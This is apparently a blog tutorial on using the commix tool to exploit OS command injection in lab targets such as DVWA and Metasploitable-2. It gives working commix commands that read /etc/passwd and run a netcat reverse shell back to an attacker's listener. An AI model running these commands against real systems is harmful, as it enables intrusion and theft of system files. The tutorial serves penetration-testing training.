Hello Everyone, as everybody knows here what is command os injection and it’s consequences. We can perform it manually by checking parameter and try multiple payloads as well as we can try it automatically using different tools like burp suite, commix.
Here we are going to talk about tool name as commix (short for [comm]and [i]njection e[x]ploiter) which usually used by pentester to test command os injection automatically.
We can used commix which comes preinstall in many of penetration testing distros. or can download from github https://github.com/commixproject/commix In my case, I downloaded it from github.
python commix.py --help
so for this demonstration you can use Metasoplitable-2 which include dvwa and Web_for_penetesters.
python commix.py -u "http://192.168.43.58/commendexec/example1.php?ip=127.0.0.1"
As we check in help of commix there are different options that we can use to perform different option.
python commix.py -u "http://192.168.43.58/commendexec/example1.php?ip=127.0.0.1" --hostname
If we want to read some sort of file which locate on vulnerable system/target then we also can easily read it.
python commix.py -u "http://192.168.43.58/commendexec/example1.php?ip=127.0.0.1" --file-read=/etc/passwd
If we want a reverse shell so we can usually do it using netcat, as well as we can also upload a php or python backdoor and execute it via using command.
python commix.py -u "http://192.168.43.58/commendexec/example1.php?ip=127.0.0.1" --os-cmd="nc -e /bin/sh 192.168.X.X 4444"
We need to listen via nc at specific port number to get shell.
nc -lvp 4444
For post request we need to give some more options like cookie and data parameters with their values. First we need to get values for that we can use any proxy tool. I used here burp proxy to capture request and got cookie as well as ip parameter.
python commix.py -u "http://192.168.43.58/dvwa/vulnerabilities/exec/" --cookie="cookie value" --data="value"
